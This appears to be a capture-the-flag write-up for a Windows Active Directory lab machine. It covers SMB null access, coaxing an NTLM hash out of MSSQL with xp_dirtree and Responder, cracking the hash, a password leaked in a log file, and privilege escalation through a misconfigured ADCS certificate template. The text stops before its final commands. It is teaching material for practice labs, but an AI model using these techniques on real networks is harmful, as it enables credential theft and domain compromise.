This machine was medium level windows which involves SQL Server interaction, then using Responder to capture the hash of the sqlsvc user and then enumerating files on the system, from there obtaining password for another user and in the end taking advantage of a vulnerable ADCS Template to gain Administrator access.
Host script results: | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 63970/tcp): CLEAN (Timeout) | Check 2 (port 40602/tcp): CLEAN (Timeout) | Check 3 (port 50586/udp): CLEAN (Timeout) | Check 4 (port 40313/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | ms-sql-info: | 10.10.11.202:1433: | Version: | name: Microsoft SQL Server 2019 RTM | number: 15.00.2000.00 | Product: Microsoft SQL Server 2019 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | smb2-time: | date: 2023-04-30T00:24:38 |_ start_date: N/A |_clock-skew: mean: 8h00m01s, deviation: 0s, median: 8h00m00s | smb2-security-mode: | 3.1.1: |_ Message signing enabled and required
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Apr 29 16:25:17 2023 -- 1 IP address (1 host up) scanned in 88.77 seconds
We don’t see any HTTP/HTTPS port open, classic AD machine. Starting with SMB port, we can connect to it as NULL user and list out the shares. It can be seen that there is a share named as Public , we can access the share and see that it contains one PDF file which we can download to our machine.
❯ smbclient -L //10.10.11.202/ -U "" Enter WORKGROUP\'s password:
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share Public Disk SYSVOL Disk Logon server share Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.11.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ❯ smbclient //10.10.11.202/Public -U "" Enter WORKGROUP\'s password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat Nov 19 11:51:25 2022 .. D 0 Sat Nov 19 11:51:25 2022 SQL Server Procedures.pdf A 49551 Fri Nov 18 13:39:43 2022
5184255 blocks of size 4096. 1463762 blocks available smb: \> mget * Get file SQL Server Procedures.pdf? yes getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (105.7 KiloBytes/sec) (average 105.7 KiloBytes/sec)
Checking the PDF, we see that had information about the MSSQL Server
From the PDF, there was an email mentioned for the user brandon.brown
1 2
mailto:brandon.brown@sequel.htb
At the end of the PDF document, we see that there is a Bonus section and it contained a credential for PublicUser which can connect to the MSSQL Server
Upon connecting to the MSSQL server as PublicUser , we can execute some common queries such for retrieving version, databases and so on. Although, this user did not have any permissions to query any of the mentioned database. But there was a stored procedure called xp_dirtree which is used to retrieve a directory from the network or local path and show them as rows/columns.
[*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'. [*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (150 7208) [!] Press help for extra shell commands SQL> SELECT * FROM fn_my_permissions(NULL, 'SERVER'); entity_name subentity_name permission_name
I started [Responder.py](http://Responder.py) on my system and tried to use xp_dirtree to list out the directory share for my IP, what will happen here is the user having the permissions to execute the xp_dirtree procedure on the system. Doing so resulted in the connection made over the Responder and had the Net-NTLMv2 has for sql_svc user. It’s possible that the SQL Server service account (sql_svc) is being used to execute the xp_dirtree stored procedure, even though the attacker has logged in as a guest user. In this case, when the victim machine attempts to access the UNC path specified in the xp_dirtree command, it will use the credentials of the SQL Server service account to authenticate to the attacker’s machine, instead of using the guest user’s credentials.
Cracking the captured hash via hashcat and using rockyou.txt was successful:
You have enabled --force to bypass dangerous warnings and errors! This can hide serious problems and should only be done when debugging. Do not report hashcat issues encountered when using --force. OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 9.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ==================================================================================================================================== * Device #1: pthread-11th Gen Intel(R) Core(TM) i7-11800H @ 2.30GHz, 3767/3831 MB (1024 MB allocatable), 2MCU
Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256
ATTENTION! Pure (unoptimized) backend kernels selected. Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance. If you want to switch to optimized backend kernels, append -O to your commandline. See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled.
The wordlist or mask that you are using is too small. This means that hashcat cannot use the full parallel power of your device(s). Unless you supply more work, your cracking speed will drop. For tips on supplying more work, see: https://hashcat.net/faq/morework
Started: Sat Apr 29 16:56:51 2023 Stopped: Sat Apr 29 16:56:53 2023
Once the hash was cracked, we can use it to connect to the machine via WINRM using evil-winrm
Apparently, we still did not get the user flag, as expected. Now, starting off with the local enumeration of the machine, I found that there was a directory named SQL Server , checking the directory I saw that there was a Logs folder, downloading the log file from it for further checking:
*Evil-WinRM* PS C:\SQLServer> cd Logs *Evil-WinRM* PS C:\SQLServer\Logs> ls
Directory: C:\SQLServer\Logs
Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
*Evil-WinRM* PS C:\SQLServer\Logs> download ERRORLOG.BAK Info: Downloading ERRORLOG.BAK to ./ERRORLOG.BAK
Info: Download successful!
Checking the log file for any interesting details, we can see that it contains password for Ryan.Cooper
1 2 3 4
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1] 2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8. 2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1] 2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
Using the credentials, we can connect via evil-winrm
Now, we can get the user flag:
1 2 3 4 5 6 7 8 9 10 11
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> cd ..\Desktop *Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> dir
Directory: C:\Users\Ryan.Cooper\Desktop
Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 4/29/2023 7:16 AM 34 user.txt
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> type user.txt f682a2bd6615f9bf0a8500dfe5e45711
Now, since we know that this is more of an AD environment, best is to run adPEAS.exe to shorten down the manual enumeration. We see that it found that there is a ADCS service which is probably here indicating that this could be the “potential” way
[?] +++++ Searching for Active Directory Certificate Services Information +++++ [+] Found at least one available Active Directory Certificate Service adPEAS does basic enumeration only, consider reading https://posts.specterops.io/certified-pre-owned-d95910965cd2
[+] Found Active Directory Certificate Services 'sequel-DC-CA': CA Name: sequel-DC-CA CA dnshostname: dc.sequel.htb CA IP Address: 10.10.11.202 Date of Creation: 11/18/2022 21:08:46 DistinguishedName: CN=sequel-DC-CA,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=sequel,DC=htb NTAuthCertificates: True Available Templates: UserAuthentication DirectoryEmailReplication DomainControllerAuthentication KerberosAuthentication EFSRecovery EFS DomainController WebServer Machine User SubCA Administrator
Furthermore, we see that there is a certificate template named UserAuthentication and we seem to have ENROLEE_SUPPLIES_SUBJECT and GenericAll permission for sql_svc user, it also have the same permission for Domain Users as well which includes Ryan.Cooper
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
[?] +++++ Searching for Vulnerable Certificate Templates +++++ adPEAS does basic enumeration only, consider using https://github.com/GhostPack/Certify or https://github.com/ly4k/Certipy
[?] +++++ Checking Template 'UserAuthentication' +++++ [!] Template 'UserAuthentication' has Flag 'ENROLLEE_SUPPLIES_SUBJECT' [!] Identity 'sequel\sql_svc' has 'GenericAll' permissions on template 'UserAuthentication' [+] Identity 'sequel\Domain Users' has enrollment rights for template 'UserAuthentication' Template Name: UserAuthentication Template distinguishedname: CN=UserAuthentication,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=sequel,DC=htb Date of Creation: 11/18/2022 21:10:22 [+] Extended Key Usage: Client Authentication, Secure E-mail, Encrypting File System EnrollmentFlag: INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS [!] CertificateNameFlag: ENROLLEE_SUPPLIES_SUBJECT [!] Template Permissions: sequel\sql_svc : GenericAll [+] Enrollment allowed for: sequel\Domain Users
Now, since we know there is a vulnerable certificate template, we can use Certify to perform an attack, to confirm things once, we can try to get more information for the template.
Now, what we can do here is first get the private key and then use openssl to convert it to the certificate file which will later be used to get the TGT for administrator
Next thing is to copy the pfx file back to the sequel machine and use Certify to request the TGT for the administrator from the forged certificate. Additionally, we can use /getcredentials flag for the Rubeus to get the NTLM hash of the administrator user: